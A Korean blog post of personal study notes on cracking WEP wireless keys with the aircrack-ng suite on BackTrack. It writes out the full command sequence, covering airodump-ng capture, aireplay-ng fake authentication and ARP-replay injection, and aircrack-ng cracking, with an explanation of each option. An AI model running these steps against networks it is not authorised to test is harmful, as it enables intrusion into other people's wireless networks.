예전에 WEP Key를 크랙했을 때의 자료를 정리해 올려본다.
WEP Key가 깨진것은 쫌 오래된 일이다. 이젠 그리 놀랍지도 않지만, 요즘 무선랜을 공부하는 중에 자료가 있어 정리해 본다.

WEP Key 크랙에 필요한 툴들은 backtrack에 다 있다.
무선 랜카드를 구하는게 문제다.

무선랜카드: Linksys WUSB54G v4 (chipset:Ralink rt2570)

#>airodump-ng –w [save_file_name] rausb0 --channel 1

[airodump-ng 옵션]

-c(--channel): 무선 네트워크의 채널

--bssid: 공격하고자 하는 AP MAC 주소

-w: IVs들이 담길 파일 이름

rausb0: 인터페이스 이름

 

 


#>aireplay-ng -1 0 –e [ESSID] –a [AP_MAC_addresss(BSSID)] –h [MY_MAC_address] rausb0

위와 같이 페이크 인증을 해야 한다. 페이크 인증이 되지 않으면 packet injection이 되지 않아 IVs패킷을 모으는게 힘들어 진다.

[aireplay-ng 옵션]

-1: fake authentication

0: 초당 재연결 시간

-e: ESSID

-a: AP MAC 주소

-h: 자신의 랜카드 MAC 주소

Rausb0: 인터페이스 이름

-3: arpreplay 모드

-b: 공격할 AP MAC


#>aireplay-ng -3 –b [AP_MAC_address(BSSID)] –h [MY_MAC_address] rausb0

--> 패킷의 량을 증폭시킨다. 아래화면을 보면 갑자기 패킷량이 증가함을 알 수 있다.

 이 방법은 ARP Request를 네트워크에 재주입 시키는 것이다. 이러면 AP는 ARP Request 패킷을 받아 새로운 IV를 생성하여 반출시킨다. 이 방법이 없었던 과거에는 IVs패킷을 모으는데 상당한 시간이 걸렸다.

 

 #>aircrack-ng –s [save_file_name.cap]
--> 획득한 패킷을 크랙한다.

 WEP Key Cracking에서는 IVs값을 얼마나 많이 모으느냐가 중요하다.
보통 128bit WEP Key를 크랙하기 위해서는 40,000~85,000개의 IVs값이 필요하다.



+ Recent posts